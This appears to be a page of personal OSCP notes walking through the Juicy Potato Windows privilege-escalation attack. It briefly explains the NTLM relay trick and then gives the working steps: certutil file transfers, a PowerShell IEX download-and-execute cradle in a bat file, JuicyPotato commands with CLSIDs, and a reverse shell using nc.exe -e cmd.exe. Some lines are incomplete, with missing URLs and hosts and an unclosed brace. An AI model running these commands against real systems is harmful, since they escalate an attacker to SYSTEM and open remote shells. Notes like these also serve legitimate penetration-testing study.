OSCP Notes
Comment on page

juicy potato

executing whoami /priv shows that impersonateprivilege is enabled>
juicy potato!
The idea behind this vulnerability is simple to describe at a high level:
  1. 1.
    Trick the “NT AUTHORITY\SYSTEM” account into authenticating via NTLM to a TCP endpoint we control.
  2. 2.
    Man-in-the-middle this authentication attempt (NTLM relay) to locally negotiate a security token for the “NT AUTHORITY\SYSTEM” account. This is done through a series of Windows API calls.
  3. 3.
    Impersonate the token we have just negotiated. This can only be done if the attackers current account has the privilege to impersonate security tokens. This is usually true of most service accounts and not true of most user-level accounts.
We’ll basically be tricking DCOM/RPC into NTLM authenticating to us. The advantage of this more complex method is that it is 100% reliable, consistent across Windows versions, and fires instantly rather than sometimes having to wait for Windows Update.
transfer over the file:
certutil -urlcache -split -f C:\Windows\Temp\JuicyPotato.exe
now I copied the ps1 shell file and adjusted the port to 4444 and started another net cat listner
Now, I created a bat file that contains the following code:
powershell "IEX (New-Object Net.Webclient).downloadstring('')"
Then, I transferred the file over to the target machine and named it reverse.bat
certutil -urlcache -split -f C:\Users\Public\reverse.bat
Finally, I ran the following command (the -l 1111 is not doing anything here)
.\JuicyPotato.exe -t * -p .\reverse.bat -l 1111 -c "{5B3E6773-3A99-4A3D-8096-7765DD11785C}"
for CSLID value, I just used one of the may here https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro/
for x86
.\Juicy.Potato.x86.exe -t * -p .\reverse.bat -l 1111 -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}
.\Juicy.Potato.x86.exe -t * -p c:\admin\procexp.exe -l 5837 -c "{659cdea7-489e-11d9-a9cd-000d56965251}"
ReverseShell Example
.\Juicy.Potato.x86.exe -l 4444 -p c:\windows\system32\cmd.exe -a "/c C:\wamp\www\PHP\gori\fileManager\collectives\DG0\gori\nc.exe -e cmd.exe 443" -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9